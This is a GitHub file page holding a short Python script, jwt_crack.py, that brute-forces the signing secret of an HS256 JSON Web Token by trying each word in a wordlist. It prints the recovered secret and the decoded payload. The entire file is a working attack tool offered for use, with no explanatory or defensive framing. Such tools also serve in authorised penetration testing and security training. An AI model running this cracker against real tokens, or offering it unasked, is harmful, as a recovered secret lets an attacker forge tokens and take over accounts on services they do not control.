jwt_crack/jwt_crack.py at main · username1001/jwt_crack · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
#!/usr/bin/env python

import jwt
import sys
import os

def load_wordlist(file_path):
    if not os.path.exists(file_path):
        print(f"[!] Wordlist file not found: {file_path}")
        sys.exit(1)

    with open(file_path, 'r', encoding='utf-8', errors='ignore') as f:
        return [line.strip() for line in f if line.strip()]

def brute_force_jwt(token, secrets):
    try:
        header = jwt.get_unverified_header(token)
    except Exception as e:
        print(f"[!] Invalid JWT header: {e}")
        return None

    if header.get("alg") != "HS256":
        print(f"[!] Unsupported algorithm: {header.get('alg')}")
        return None

    for secret in secrets:
        try:
            decoded = jwt.decode(token, secret, algorithms=["HS256"])
            print(f"[+] Secret found: '{secret}'")
            print(f"[+] Payload: {decoded}")
            return secret
        except jwt.exceptions.InvalidSignatureError:
            continue
        except Exception as e:
            continue

    print("[-] No secret matched.")
    return None

if __name__ == "__main__":
    if len(sys.argv) != 3:
        print(f"Usage: python {sys.argv[0]} <jwt_token> <wordlist.txt>")
        sys.exit(1)

    token = sys.argv[1]
    wordlist_path = sys.argv[2]

    secrets = load_wordlist(wordlist_path)
    brute_force_jwt(token, secrets)